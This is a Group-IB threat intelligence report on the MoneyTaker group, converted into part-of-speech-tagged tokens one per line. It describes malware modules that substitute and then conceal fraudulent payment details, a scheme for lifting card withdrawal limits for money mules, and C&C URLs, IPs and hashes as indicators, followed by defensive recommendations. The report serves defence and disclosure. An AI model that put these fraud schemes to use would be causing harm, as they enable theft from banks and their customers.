” NN
, ,
“ NNP
kpp NNP
” NNP
, ,
” NNP
bik NN
” NNP
, ,
” NNP
corr NN
” NNP
, ,
” NNP
purpose VBD
” NNP
. .

If IN
it PRP
manages VBZ
to TO
get VB
all PDT
the DT
necessary JJ
fields NNS
from IN
the DT
payment NN
order NN
and CC
the DT
“ JJ
Xml-Workfile JJ
” NN
file NN
has VBZ
required VBN
details NNS
, ,
then RB
the DT
payment NN
order NN
will MD
be VB
modified VBN
by IN
substituting VBG
original JJ
payment NN
details NNS
with IN
fraudulent JJ
ones NNS
. .

That DT
said VBD
, ,
the DT
payment NN
amount NN
does VBZ
not RB
change NN
, ,
and CC
for IN
each DT
replaced VBN
document NN
the DT
attackers NNS
have VBP
a DT
separate JJ
account NN
. .

The DT
accounts NNS
for IN
which WDT
the DT
money NN
goes VBZ
are VBP
not RB
repeated VBN
. .

The DT
success NN
of IN
replacement NN
is VBZ
due JJ
to TO
the DT
fact NN
that IN
at IN
this DT
stage NN
the DT
payment NN
order NN
has VBZ
not RB
yet RB
been VBN
signed VBN
, ,
which WDT
will MD
occur VB
after IN
payment NN
details NNS
are VBP
replaced VBN
. .

For IN
further JJ
operation NN
of IN
another DT
module NN
- :
ED NNP
, ,
after IN
each DT
automated VBN
replacement NN
the DT
XML NNP
module NN
stores NNS
information NN
in IN
the DT
“ JJ
Xml-Resultfile JJ
” NN
file NN
in IN
the DT
following JJ
format NN
: :
# #
Id= NN
OrigAcc= NN
OrigBic= NN
OrigCor= NN
Purpose= NN
HackAcc= NN
HackBic= NN
HackCor= NN
Sum= NN
PayerPersonalAcc= NN
# #
CONCEALMENT NNP
MODULE NNP
– NNP
ED.EXE NNP
The DT
“ NNP
ed.exe NN
” NNP
file NN
is VBZ
started VBN
by IN
the DT
main JJ
module NN
passing VBG
the DT
name NN
of IN
a DT
new JJ
file NN
in IN
the DT
“ NN
% NN
АРМ JJ
КБР CD
% NN
\exq\chk CC
” JJ
directory NN
and CC
the DT
configuration NN
file NN
. .

• NN
After IN
the DT
payment NN
order NN
is VBZ
modified VBN
, ,
signed VBN
and CC
sent VBN
, ,
the DT
following VBG
activity NN
is VBZ
performed VBN
: :
• NN
It PRP
is VBZ
transferred VBN
to TO
the DT
logical JJ
control NN
where WRB
the DT
correctness NN
of IN
the DT
electronic JJ
payment NN
message NN
is VBZ
checked VBN
, ,
and CC
the DT
compliance NN
of IN
the DT
payment NN
details NNS
with IN
reference NN
data NNS
is VBZ
established VBN
• VB
The DT
program NN
checks VBZ
the DT
possibility NN
of IN
payment NN
within IN
the DT
amount NN
of IN
liquid NN
funds NNS
in IN
the DT
bank NN
account NN
23 CD
• VB
The DT
electronic JJ
payment NN
message NN
is VBZ
accepted VBN
for IN
execution NN
; :
the DT
funds NNS
are VBP
debited VBN
from IN
the DT
payer NN
’ NNP
s NN
account NN
and CC
credited VBD
to TO
the DT
beneficiary JJ
’ NN
s NN
account NN
• NNS
Based VBN
on IN
the DT
results NNS
of IN
execution NN
, ,
an DT
electronic JJ
message NN
ED206 NNP
( (
confirmation NN
of IN
debit NN
) )
is VBZ
sent VBN
to TO
the DT
address NN
of IN
the DT
issuer NN
. .

• VB
The DT
message NN
is VBZ
decrypted VBN
, ,
unpacked JJ
, ,
passes VBZ
the DT
verification NN
of IN
the DT
authentication NN
code NN
and CC
security NN
code NN
and CC
is VBZ
stored VBN
in IN
the DT
“ NN
% NN
APM NNP
KBR NNP
% NN
\exq\chk NNP
” NNP
directory NN
• IN
The DT
main JJ
module NN
starts VBZ
the DT
concealment NN
module NN
passing VBG
the DT
incoming VBG
electronic JJ
message NN
. .

The DT
ED NNP
module NN
checks NNS
whether IN
the DT
incoming NN
electronic JJ
message NN
is VBZ
ED206 NNP
( (
debit/credit JJ
confirmation NN
following VBG
the DT
results NNS
of IN
debit JJ
transaction NN
) )
or CC
ED211 NNP
( (
following VBG
the DT
results NNS
of IN
the DT
day NN
or CC
payment NN
batch NN
) )
. .

For IN
ED206 NNP
, ,
the DT
field NN
“ NNP
CorrAcc NNP
” NNP
is VBZ
verified VBN
, ,
for IN
ED211 NNP
the DT
“ JJ
PayeePersonalAcc NNP
” NNP
field NN
is VBZ
verified VBN
. .

The DT
values NNS
of IN
these DT
fields NNS
are VBP
compared VBN
with IN
HackAcc NNP
in IN
the DT
“ JJ
Xml-Resultfile JJ
” NN
file NN
( (
this DT
is VBZ
the DT
file NN
in IN
which WDT
the DT
XML NNP
module NN
stores NNS
information NN
about IN
replacements NNS
) )
. .

If IN
the DT
values NNS
match VBP
, ,
then RB
the DT
module NN
restores VBZ
the DT
original JJ
payment NN
details NNS
. .

This DT
means VBZ
that IN
the DT
payment NN
order NN
is VBZ
sent VBN
and CC
accepted VBN
for IN
execution NN
with IN
the DT
fraudulent JJ
payment NN
details NNS
, ,
and CC
the DT
responses NNS
come VBN
as IN
if IN
the DT
payment NN
details NNS
were VBD
the DT
initial JJ
ones NNS
. .

This DT
gives VBZ
cybercriminals NNS
extra JJ
time NN
to TO
mule VB
funds NNS
before IN
the DT
theft NN
is VBZ
detected VBN
. .

TEMPORARY NNP
FILE NNP
MODULE NNP
– NNP
TXT.EXE NNP
The DT
main JJ
module NN
is VBZ
also RB
able JJ
to TO
start VB
the DT
TXT NNP
module NN
by IN
passing VBG
the DT
name NN
of IN
the DT
temporary JJ
file NN
of IN
the DT
AWS NNP
CBR NNP
as IN
an DT
argument NN
. .

However RB
, ,
we PRP
have VBP
not RB
managed VBN
to TO
obtain VB
this DT
module NN
and CC
do VBP
not RB
know VB
its PRP$
function NN
. .

All DT
MoneyTaker NNP
modules NNS
do VBP
not RB
have VB
information NN
displayed VBN
and CC
actively RB
record VB
their PRP$
activity NN
to TO
log VB
files NNS
. .

There EX
is VBZ
also RB
the DT
possibility NN
of IN
a DT
test NN
run NN
, ,
which WDT
is VBZ
performed VBN
after IN
installation NN
on IN
a DT
computer NN
with IN
AWS NNP
CBR NNP
. .

Hackers NNS
use VBP
it PRP
to TO
control VB
the DT
program NN
operation NN
. .

After IN
this DT
attack NN
, ,
they PRP
did VBD
not RB
conduct VB
a DT
single JJ
new JJ
attack NN
on IN
the DT
AWS NNP
CBR NNP
using VBG
this DT
tool NN
. .

24 CD
In IN
November NNP
2017 CD
, ,
they PRP
again RB
attacked VBD
another DT
bank NN
in IN
Russia NNP
. .

Hackers NNS
managed VBD
to TO
gain VB
access NN
to TO
the DT
servers NNS
and CC
workstations NNS
of IN
AWS NNP
CBR NNP
operators NNS
, ,
but CC
they PRP
were VBD
not RB
able JJ
to TO
use VB
MoneyTaker NNP
malware NN
because IN
the DT
server NN
was VBD
in IN
a DT
completely RB
isolated JJ
segment NN
. .

After IN
an DT
unsuccessful JJ
attempt NN
to TO
steal VB
money NN
through IN
the DT
system NN
of IN
interbank NN
transfers NNS
, ,
they PRP
switched VBD
their PRP$
focus NN
to TO
card VB
processing NN
as IN
in IN
the DT
the DT
US NNP
based VBN
attacks NNS
. .

25 CD
07 CD
POTENTIAL NNP
ATTACKS NNP
ON NNP
SWIFT NNP
Through IN
analysis NN
of IN
the DT
attackers NNS
’ VBP
infrastructure NN
, ,
we PRP
discovered VBN
that IN
they PRP
always RB
try VBP
to TO
steal VB
internal JJ
banking NN
system NN
documentation NN
: :
administrator NN
guides NNS
, ,
internal JJ
instructions NNS
and CC
regulations NNS
, ,
change NN
request NN
forms NNS
, ,
transaction NN
logs NNS
, ,
etc FW
. .

We PRP
did VBD
not RB
find VB
any DT
evidence NN
of IN
successful JJ
attacks NNS
on IN
SWIFT NNP
conducted VBN
by IN
this DT
group NN
, ,
nor CC
did VBD
we PRP
find VB
any DT
connections NNS
with IN
already RB
known VBN
incidents NNS
, ,
for IN
example NN
, ,
in IN
Hong NNP
Kong NNP
, ,
Ukraine NNP
, ,
or CC
Turkey NNP
. .

However RB
, ,
we PRP
know VBP
that IN
in IN
addition NN
to TO
the DT
abovementioned VBN
documents NNS
these DT
threat NN
actors NNS
search VBP
for IN
and CC
copy NN
documents NNS
related VBN
to TO
SWIFT NNP
, ,
which WDT
may MD
indicate VB
pending VBG
attacks NNS
on IN
this DT
system NN
. .

Now RB
hackers NNS
have VBP
the DT
following JJ
documents NNS
at IN
their PRP$
disposal NN
: :
• NN
Installation NN
and CC
Administration NNP
Guide NNP
for IN
SWIFT NNP
Alliance NNP
Access RB
7.0 CD
• JJ
Security NNP
Guide NNP
for IN
SWIFT NNP
Alliance NNP
Access NNP
7.0 CD
• NN
System NNP
Administrator NNP
Procedures NNP
, ,
for IN
Ocean NNP
Systems NNP
’ NNP
wire NN
transfer NN
product NN
FedLink NNP
• NNS
User NNP
Procedures NNP
Manual NNP
, ,
for IN
Ocean NNP
Systems NNP
’ NNP
wire NN
transfer NN
product NN
FedLink NNP
The DT
two CD
last JJ
mentioned JJ
documents NNS
are VBP
of IN
interest NN
, ,
because IN
they PRP
describe VBP
how WRB
to TO
make VB
transfers NNS
through IN
SWIFT NNP
using VBG
the DT
FedLink NNP
system NN
. .

According VBG
to TO
FedLink NNP
’ NNP
s VBZ
official JJ
website NN
, ,
now RB
they PRP
have VB
more JJR
than IN
200 CD
customers NNS
in IN
the DT
US NNP
and CC
Latin NNP
America NNP
. .

We PRP
assume VB
that IN
banks NNS
in IN
Latin NNP
America NNP
may MD
become VB
the DT
next JJ
target NN
of IN
this DT
group NN
. .

26 CD
Figure NN
. .

Screenshot NNP
of IN
the DT
guidelines NNS
on IN
card JJ
transaction NN
processing VBG
via IN
terminal NN
Figure NN
. .

Fragment NN
on IN
Credit NNP
limit NN
increase NN
from IN
the DT
card NN
processing NN
guidelines NNS
08 CD
ATTACK NNP
ON NNP
CARD NNP
PROCESSING NN
The DT
first JJ
attack NN
on IN
card NN
processing NN
that IN
we PRP
attribute VBP
to TO
this DT
group NN
was VBD
conducted VBN
in IN
May NNP
2016 CD
. .

Having VBG
gained VBN
access NN
to TO
the DT
bank NN
network NN
, ,
the DT
attackers NNS
compromised VBN
the DT
workstation NN
of IN
First NNP
Data NNP
’ NNP
s NN
STAR NNP
network NN
portal NN
operators NNS
, ,
making VBG
the DT
changes NNS
required VBN
and CC
withdrawing VBG
the DT
money NN
. .

In IN
January NNP
2017 CD
, ,
the DT
attack NN
was VBD
repeated VBN
in IN
another DT
bank NN
. .

Focusing VBG
on IN
card NN
processing VBG
systems NNS
enables VBZ
the DT
attackers NNS
to TO
carry NN
out RP
attacks NNS
that WDT
are VBP
easier JJR
and CC
safer JJR
for IN
‘ NNP
money NN
mules NNS
’ VBP
who WP
provide VB
cash NN
withdrawals NNS
. .

The DT
attackers NNS
are VBP
in IN
one CD
country NN
, ,
the DT
victim NN
bank NN
is VBZ
in IN
another DT
and CC
cash NN
is VBZ
withdrawn VBN
by IN
mules NNS
in IN
a DT
third JJ
locale NN
. .

This DT
scheme NN
is VBZ
simple JJ
to TO
implement VB
and CC
does VBZ
not RB
require VB
much JJ
investment NN
from IN
attackers NNS
. .

That DT
explains VBZ
its PRP$
increased JJ
usage NN
by IN
cybercriminal JJ
groups NNS
such JJ
as IN
Moneytaker NNP
and CC
Cobalt NNP
. .

The DT
scheme NN
is VBZ
extremely RB
simple JJ
: :
• NN
After IN
taking VBG
control NN
over IN
a DT
bank NN
network NN
, ,
the DT
attackers NNS
checked VBN
if IN
they PRP
could MD
connect VB
to TO
the DT
card NN
processing NN
system NN
. .

• NN
They PRP
legally RB
opened VBD
or CC
bought VBD
cards NNS
of IN
the DT
bank NN
whose WP$
IT NNP
system NN
they PRP
had VBD
hacked VBN
. .

• JJ
Money NNP
mules NNS
– VBP
criminals NNS
who WP
withdraw VBP
money NN
from IN
ATMs NNP
– NN
with IN
previously RB
activated VBN
cards NNS
deployed VBN
and CC
waited VBN
for IN
the DT
operation NN
to TO
begin VB
. .

• NN
After IN
getting VBG
into IN
the DT
card NN
processing NN
system NN
, ,
the DT
attackers NNS
removed VBN
or CC
increased VBN
cash NN
withdrawal NN
limits NNS
for IN
the DT
cards NNS
held VBD
by IN
the DT
mules NNS
. .

• NN
They PRP
removed VBD
overdraft NN
limits NNS
, ,
which WDT
made VBD
it PRP
possible JJ
to TO
go VB
overdrawn NNS
even RB
with IN
debit NN
cards NNS
. .

• NN
Using VBG
these DT
cards NNS
, ,
the DT
mules NNS
withdrew VBP
cash NN
from IN
ATMs NNP
, ,
one CD
by IN
one CD
. .

The DT
average JJ
loss NN
caused VBN
by IN
one CD
attack NN
was VBD
about IN
$ $
500,000 CD
USD NNP
. .

As IN
in IN
the DT
case NN
with IN
the DT
attacks NNS
on IN
SWIFT NNP
, ,
they PRP
gather VBP
internal JJ
documents NNS
from IN
banks NNS
in IN
order NN
to TO
get VB
a DT
better JJR
understanding NN
of IN
how WRB
to TO
handle VB
certain JJ
systems NNS
. .

27 CD
09 CD
USING NN
BANKING NN
TROJANS NN
Through IN
analysis NN
of IN
the DT
C NNP
& CC
C NNP
server NN
used VBN
to TO
conduct VB
targeted JJ
attacks NNS
on IN
banks NNS
, ,
we PRP
discovered VBD
two CD
related JJ
files NNS
: :
Name NN
MD5 NN
Type NN
c4c.exe NN
c7d20b726708a441db3d864457a097833654719513990f823b1deb7c48b65472 NN
Citadel NN
cbcs.exe NN
e01e9cdfff085393362e1e2e3ec8cae33c536053760e65c7617d5a0dfd005874 NN
Citadel NNP
Backconnect NNP
Server NNP
The DT
c4c.exe NN
file NN
uses VBZ
the DT
following JJ
address NN
as IN
the DT
C NNP
& CC
C NNP
server NN
: :
hххp NN
: :
//82.146.54.5/api/cfg.ashx NN
The DT
sample NN
was VBD
distributed VBN
online NN
as IN
a DT
document NN
named VBN
fedwire NN
_ VBZ
22127061503 CD
_ NN
output NN
_ NNP
report.doc NN
( (
2818a0c63d729cb CD
1f2d223e15c762209 CD
) )
, ,
which WDT
was VBD
downloaded VBN
from IN
the DT
server NN
hxxp NN
: :
//188.120.235.201/fce2857010e1.exe NN
( (
369ad5f7bc9a555f3395059 CD
978c720bb CD
) )
Related JJ
indicators NNS
: :
c4c.exe NN
82.146.54.5 CD
Citadel NN
fedwire_22127061503_output_report.doc NN
188.120.235.201 CD
Downloading VBG
the DT
file NN
fce2857010e1.exe NN
fce2857010e1.exe NN
82.146.54.5 CD
Citadel NN
operating_circular_6_app_e1.docm NN
www.riverbed.com NN
188.120.235.201 CD
188.120.230.218 CD
82.146.54.5 CD
28 CD
10 CD
USING NN
POS NNP
TROJANS NN
Through IN
analysis NN
of IN
the DT
C NNP
& CC
C NNP
server NN
used VBN
to TO
conduct VB
targeted JJ
attacks NNS
, ,
we PRP
discovered VBD
two CD
related JJ
files NNS
: :
Name NN
MD5 NN
Type NN
EmployeeID-847267.doc NN
83d21d808f7408ebcb3947cb88366172 CD
Document NN
with IN
marcos NN
203.exe CD
70d8729ca630dd3b0f9a62998642ec76 CD
Kronos NNS
In IN
November NNP
2016 CD
researchers NNS
at IN
Proofpoint NNP
reported VBD
large JJ
email NN
phishing VBG
campaigns NNS
, ,
primarily RB
targeting VBG
companies NNS
in IN
the DT
UK NNP
and CC
US NNP
. .

The DT
email NN
messages NNS
contained VBD
a DT
malicious JJ
document NN
, ,
or CC
a DT
phishing JJ
link NN
. .

When WRB
the DT
victim NN
opened VBD
the DT
attached JJ
document NN
, ,
a DT
macro NN
which WDT
downloaded VBN
Kronos NNP
banking NN
Trojan NNP
form VBD
the DT
URL NNP
hxxp NN
: :
//info.docs-sharepoint JJ
[ NN
. .
] JJ
com/officeup NN
[ NNP
. .
] NN
exe NN
. .

In IN
the DT
investigated JJ
case NN
the DT
“ NN
203.exe CD
” NN
file NN
was VBD
downloaded VBN
from IN
the DT
following VBG
link NN
: :
hххp NN
: :
//profile.invoice-sharepoint.com/Emplid/officeup.exe JJ
, ,
in IN
the DT
event NN
of IN
opening VBG
the DT
file NN
LHarv.xls NNP
( (
de05666412026c6d6c4740b79bc NN
71dbd6420c0c62ad59cbadcd7d506614bc87d CD
) )
The DT
Kronos NNP
banking NN
Trojan NNP
reported VBN
by IN
Proofpoint NNP
installed VBD
three CD
payloads NNS
from IN
the DT
following JJ
URLs NN
: :
hxxp NN
: :
//networkupdate NN
[ NN
. .
] CC
online/kbps/upload/c1c06f7d JJ
[ NN
. .

] NN
exe NN
Smoke NNP
Loader NNP
hxxp NN
: :
//networkupdate NN
[ NN
. .
] CC
online/kbps/upload/1f80ff71 JJ
[ NN
. .

] NN
exe NN
Smoke NNP
Loader NNP
hxxp NN
: :
//networkupdate NN
[ NN
. .
] CC
online/kbps/upload/a8b05325 JJ
[ NN
. .

] NN
exe NN
ScanPOS NN
ScanPOS NNP
is VBZ
a DT
unique JJ
point-of-sale NN
( (
PoS NNP
) )
malware NN
. .

Upon IN
execution NN
, ,
ScanPOS NNP
grabs NN
information NN
about IN
the DT
current JJ
running NN
processes NNS
and CC
collects VBZ
the DT
user NN
name NN
and CC
privileges NNS
on IN
the DT
infected JJ
system NN
. .

That DT
said VBD
, ,
it PRP
is VBZ
primarily RB
designed VBN
to TO
dump VB
process JJ
memory NN
and CC
search NN
for IN
payment NN
card NN
track NN
data NNS
. .

The DT
Trojan NNP
checks VBZ
any DT
collected JJ
data NNS
using VBG
Luhn NNP
’ NNP
s NN
algorithm NN
for IN
validation NN
and CC
then RB
sends VBZ
it PRP
outbound IN
to TO
the DT
C NNP
& CC
C NNP
server NN
. .

The DT
C NNP
& CC
C NNP
address NN
for IN
ScanPOS NNP
was VBD
hxxp VBN
: :
//invoicesharepoint NN
[ NN
. .

] NN
com/ NN
gateway RB
[ NN
. .

] NN
php NN
RECOMMENDATIONS $
11 CD
29 CD
Run NNP
an DT
indicator NN
check-up NN
in IN
the DT
following JJ
section NN
Operating NN
system NN
security NN
• JJ
Prohibit NNP
any DT
remote JJ
logon NN
to TO
the DT
system NN
( (
RDP NNP
, ,
SMB NNP
, ,
RPC NNP
) )
for IN
local JJ
administrators NNS
. .

We PRP
recommend VBP
that IN
you PRP
use VBP
only RB
Logon NNP
type NN
2 CD
( (
interactive JJ
) )
: :
https NN
: :
//technet.microsoft.com/en-ie/library/ JJ
cc787567 NN
( (
v=ws.10 NN
) )
.aspx NN
• JJ
Configure NNP
the DT
following JJ
parameter NN
in IN
the DT
registry NN
on IN
all DT
PCs NNS
running VBG
Windows NNP
7 CD
( (
and CC
up RB
) )
and CC
all PDT
the DT
servers NNS
using VBG
Windows NNS
2008R2 CD
: :
HKEY NNP
_ NNP
LOCAL NNP
_ NNP
MACHINE/SYSTEM/CurrentControlSet/Control/ NNP
SecurityProviders/WDigest/UseLogonCredential=0 NN
This DT
registry NN
key JJ
prohibits NNS
storing VBG
unencrypted JJ
passwords NNS
in IN
RAM NNP
( (
which WDT
are VBP
usually RB
leveraged VBN
by IN
Mimikatz NNP
) )
• JJ
Prohibit NNP
a DT
standard JJ
local JJ
administrator NN
with IN
an DT
ID=500 NNP
( (
which WDT
is VBZ
vulnerable JJ
pass-the-hash JJ
attack NN
) )
. .

Add NNP
another DT
administrator NN
and CC
install VB
updates NNS
to TO
protect VB
against IN
Pass NNP
the DT
hash NN
attacks NNS
: :
https NN
: :
//technet.microsoft.com/library/security/2871997 JJ
# #
ID0E3D NNP
• JJ
Minimize NNP
and CC
completely RB
deny JJ
granting VBG
administrator NN
privileges NNS
for IN
users NNS
of IN
local JJ
PCs NNS
, ,
especially RB
for IN
users NNS
who WP
work VBP
with IN
external JJ
information NN
systems NNS
. .

• NN
Use NNP
a DT
different JJ
local JJ
Administrator NNP
account NN
password NN
on IN
every DT
node NN
, ,
which WDT
must MD
not RB
match VB
any DT
domain NN
administration NN
credentials NNS
. .

If IN
this DT
rule NN
is VBZ
not RB
currently RB
applied VBN
– NNP
change VBP
all PDT
the DT
passwords NNS
, ,
make VBP
them PRP
unique JJ
, ,
long JJ
and CC
complex JJ
. .

Securely RB
manage VB
local JJ
Administrator NNP
passwords NNS
by IN
using VBG
specialized JJ
tools NNS
, ,
such JJ
as IN
Microsoft NNP
’ NNP
s VBD
Local NNP
Administrator NNP
Password NNP
Solution NN
( (
LAPS NNP
) )
. .

• JJ
Deny NNP
granting VBG
domain NN
administrator NN
privileges NNS
for IN
common JJ
user JJ
accounts NNS
. .

In IN
order NN
to TO
perform VB
domain NN
administrative JJ
tasks NNS
, ,
create VBP
a DT
separate JJ
additional JJ
domain NN
user NN
account NN
for IN
each DT
administrator NN
, ,
while IN
preventing VBG
them PRP
from IN
performing VBG
daily JJ
routine JJ
administrator NN
work NN
on IN
their PRP$
PCs NNS
under IN
an DT
account NN
with IN
administrative JJ
rights NNS
. .

30 CD
• NN
Isolate JJ
hosts NNS
in IN
the DT
same JJ
VLAN NNP
, ,
so IN
that DT
one CD
workstation NN
would MD
not RB
be VB
able JJ
to TO
gain VB
access NN
to TO
another DT
one NN
on IN
network NN
levels NNS
L2/L3 NNP
, ,
and CC
could MD
access NN
shared VBN
network NN
segments NNS
( (
printers NNS
, ,
servers NNS
, ,
etc FW
. .
) )
. .

• JJ
Provide NNP
timely RB
updates VBZ
of IN
OS NNP
, ,
antivirus NN
software NN
and CC
other JJ
applications NNS
. .

• JJ
Configure NNP
the DT
service NN
accounts NNS
with IN
the DT
minimum JJ
set NN
of IN
permissions NNS
necessary JJ
for IN
them PRP
to TO
function VB
properly RB
( (
with IN
respect NN
to TO
logon VB
type NN
and CC
group NN
membership NN
) )
. .

Strictly RB
prohibit NN
adding VBG
service NN
accounts NNS
to TO
the DT
local JJ
administrators NNS
group NN
unless IN
absolutely RB
necessary JJ
. .

• NN
Use NNP
IDS NNP
solutions NNS
and CC
a DT
sandbox NN
to TO
analyze VB
files NNS
. .

We PRP
recommend VB
that IN
companies NNS
apply VBP
technology NN
like IN
Group- NNP
IB NNP
’ NNP
s VBD
TDS NNP
Sensor NNP
and CC
sandbox NN
, ,
which WDT
are VBP
able JJ
to TO
detect VB
and CC
prevent NN
these DT
types NNS
of IN
attacks NNS
. .

Measures NNS
to TO
protect VB
interbank NN
transfer NN
system NN
, ,
card NN
processing NN
and CC
ATMs NNP
• NN
Isolate NNP
hosts NNS
of IN
workstations NNS
and CC
servers NNS
related VBN
to TO
the DT
interbank NN
transfer NN
system NN
. .

• JJ
Ensure NNP
the DT
integrity NN
of IN
data NNS
, ,
system NN
and CC
application NN
software NN
deployed VBN
on IN
the DT
infrastructure NN
servers VBZ
; :
introduce VB
application NN
whitelisting VBG
on IN
workstations NNS
. .

• JJ
Ensure NNP
monitoring NN
and CC
notifications NNS
in IN
case NN
of IN
anomalous JJ
time NN
of IN
access NN
to TO
servers NNS
and CC
workstations NNS
by IN
operators NNS
of IN
financial JJ
systems NNS
. .

• JJ
Ensure NNP
monitoring NN
and CC
notifications NNS
of IN
changes NNS
to TO
overdraft VB
and CC
cash NN
withdrawal NN
limits NNS
. .

31 CD
ABOUT RB
GROUP-IB NN
GROUP-IB NNP
HELPS NNP
MAJOR NNP
CORPORATIONS NNP
RECOGNIZE NNP
AND CC
REACT NNP
TO NNP
THE NNP
MOST NNP
SOPHISTICATED NNP
CYBER- NNP
THREATS NNP
. .

Profound NNP
human NN
intelligence NN
and CC
cutting- NN
edge NN
technology NN
Group-IB JJ
leverages VBZ
its PRP$
proprietary JJ
high-tech JJ
infrastructure NN
to TO
monitor VB
hacker NN
activity NN
and CC
extract NN
unique JJ
data NNS
. .

These DT
data NNS
is VBZ
accomplished JJ
by IN
profound JJ
human JJ
intelligence NN
by IN
experts NNS
who WP
conduct VBP
incident NN
response NN
and CC
monitor VB
the DT
most RBS
secretive JJ
underground JJ
hacker NN
forums NNS
. .

NETWORK NNP
INFRASTRUCTURE NNP
• JJ
HoneyNet NNP
and CC
botnet NN
analysis NN
• JJ
Hacker NNP
community NN
infiltration NN
• JJ
Open-source NNP
monitoring NN
• NN
Network NNP
attack NN
trackers NNS
• JJ
TDS NNP
Sensors NNS
• JJ
Behavior NNP
analysis NN
system NN
Investigations NNS
HUMAN NNP
INTELLIGENCE NNP
• NN
Forensics NNS
• NN
• NNS
Malware NNP
monitoring NN
and CC
research NN
• JJ
CERT-GIB NNP
request NN
database NN
• JJ
Security NNP
assessment NN
• JJ
Group-IB NNP
case NN
studies NNS
GLOBAL NNP
DATA NNP
EXCHANGE NNP
• JJ
Computer NNP
incident NN
response NN
teams NNS
• NN
Domain NNP
registrar NN
and CC
hosting NN
providers NNS
• JJ
Cyber NNP
security NN
vendors NNS
• JJ
Cybersecurity NNP
associations NNS
& CC
professional JJ
organizations NNS
• NN
Europol NNP
, ,
Interpol NNP
and CC
law NN
enforcement NN
agencies NNS
EUROPOL NN
INTERPOL NN
WORLD NN
ECONOMIC NN
FORUM NN
IDC NN
GARTNER NN
FORRESTER NN
Official JJ
ЕUROPOL NN
and CC
INTERPOL NNP
partner NN
Recommended VBN
by IN
the DT
Organization NN
for IN
Security NNP
and CC
Co-operation NN
in IN
Europe NNP
( (
OSCE NNP
) )
Member NNP
of IN
the DT
World NNP
Economic NNP
Forum NNP
Group-IB JJ
Threat NNP
Intelligence NNP
has VBZ
been VBN
recognized VBN
by IN
top JJ
industry NN
researcher NN
reports NNS
Products NNS
and CC
services NNS
powered VBN
by IN
Threat NN
Intelligence NN
Comprehensive NNP
ecosystem NN
of IN
threat NN
intelligence NN
and CC
security NN
solutions NNS
empowers NNS
organizations NNS
to TO
identify VB
threats NNS
sooner RB
, ,
respond NN
faster RBR
, ,
and CC
build VB
more RBR
effective JJ
defenses NNS
against IN
sophisticated JJ
cyberattacks NNS
. .

EARLY NNP
WARNING NN
SYSTEM NNP
• JJ
Threat NNP
Intelligence NN
• NN
TDS NNP
• JJ
Secure NNP
Bank NNP
• JJ
Secure NNP
Portal NNP
PREVENTION NN
• JJ
Security NNP
audit NN
• JJ
Compromise NNP
Assessment NNP
• RB
Red NNP
Teaming NNP
• NNP
Brand NNP
Protection NNP
• NN
Antipiracy NN
RESPONSE $
24/7/365 CD
• JJ
Computer NNP
Emergency NN
Response NNP
Team NN
CERT-GIB NN
RESPONSE $
24/7/365 CD
• JJ
Digital NNP
forensics NNS
and CC
malware NN
analysis NN
Incident NNP
investigation NN
• NN
• JJ
Financial NNP
and CC
corporate JJ
Investigation NN
32 CD
12 CD
INDICATORS NNS
OF IN
COMPROMISE NNP
Malicious JJ
SSL NNP
certificates NNS
Issuer NN
SSL NNP
fingerprint NN
IP NNP
, ,
where WRB
it PRP
was VBD
used VBN
MetaBank NNP
LTD NNP
8b7fa4ef88a303bb47240c9b8012c80507074f2e CD
Yahoo NNP
Inc NNP
. .
c29d79df9b5416fd416c31e57cd525dfc23a8f66 NN
83.220.172.71 CD
37.46.133.190 CD
172.86.121.11 CD
Fiserv NNP
Inc NNP
b3dd855fc1b32757bde5c9f737808f150d6f57e6 NN
146.185.243.19 CD
Microsoft NNP
Ltd NNP
98cbe44e1a30448a3ff6be38e8b277ae189f9b45 CD
82.146.54.5 CD
Federal NNP
Reserve NNP
Bank NNP
5fe7f5924ee2382dbfa5c8bdc6d04f0ff5d9273a CD
188.120.235.201 CD
Bank NNP
of IN
America NNP
5922a06f03f6464921462c07842afb18da1577e9 CD
188.120.230.218 CD
188.120.230.235 CD
VMware NN
7aa02d827609e0b6b3dca6d0ef82fe3a1fbe1d67 CD
185.141.25.222 CD
Privilege NNP
escalation NN
File NN
name NN
SHA256 NN
Description NN
ASLRSideChannelAttack NNP
. .

exe NN
9a82aa5af19fa0a6167f87ee500856d53690c92c8c6449af54d8e5 CD
d33cf8bff4 NN
LPE NNP
Win10x64 NNP
cve.bat NN
cve.exe NN
7ff092853c15b51315414939c165ea9bce1f920d2d99e570d747ee7fc CD
9fa734a CD
BAT NNP
LPE NNP
executor NN
98b6f9172ca273deef324f032a8e992b6e6ca3c6542449a48246b3 CD
646b6c8cb6 CD
cve-2016-7255 NN
cve-2016-7255.exe NN
5ec6a6c9a7233a7ff68d989d830a2249e94a2784e69d5c8a593d3 CD
345da14a6b5 CD
cve-2016-7255 NN
cve-2016-7255test.exe NN
df69966d721193e2315723dd71636b93cc76b38cfa046dce45d7aec NN
4856f4bee CD
cve-2016-7255 NN
33 CD
Keylogger NNP
and CC
Sreenshotter NNP
File NN
name NN
SHA256 NN
perfmon.exe NN
2049df4a5f92709bad14a7e2b8c0cfcb6ede2f71009cb3483892108e949800e6 CD
perfmonpe.exe NN
ff3c84266fdba3638b9fc1a41cab87cf4021eb531954343d1a328b307b586ac6 NN
recycler.exe NN
206aec8132cbb2497553b1f2c1c40733188929bad2feb0640e99474b327e564b CD
Description NN
Dropper NNP
of IN
Keylogger/ NNP
Screenshotter NN
Dropper NNP
of IN
Keylogger/ NNP
Screenshotter NN
Dropper NNP
of IN
Keylogger/ NNP
Screenshotter NN
xkey.exe NN
b2e02579cf0e9c2a57bff806b57d6b868d5d411264d38ff7ac7e6b47d0d2a33d NN
Keylogger/ NNP
Screenshotter NNP
xkey_x86.dll NN
60e6652ae39ecd9314ba0e7936b41ca813737183c4eaa96dce0b4a36a90375dd CD
Keylogger/ NNP
Screenshotter NNP
hkcmd.exe NN
4672E624C5210A523AA0A0B56DB677B6 CD
Keylogger NNP
stores NNS
logs NNS
in IN
snmp.dat NN
Malware NNP
for IN
AWS NNP
CBR NNP
File NN
name NN
SHA256 NN
Description NN
main.exe NN
igfxserv.exe NN
xml.exe NN
ed.exe NN
77003E4E6EB091643DFF0C0F967D8C9001DE7D8689E493D67D0F4275 CD
CC189083 NN
Main NNP
module NN
5F6D1B1728EAE505B23C7FD16E04AD534D44465AFE4C3FD420475CAB2 CD
5B61B02 CD
Module NNP
which WDT
replaces VBZ
payment NN
data NNS
2B365805E50A09B0149FF2E706CB19D7FAC71FC6B1D1273BE8EB3E93875 CD
0C23B CD
Module NNP
which WDT
replaces VBZ
/ CD
hides NNS
fraud NN
transactions NNS
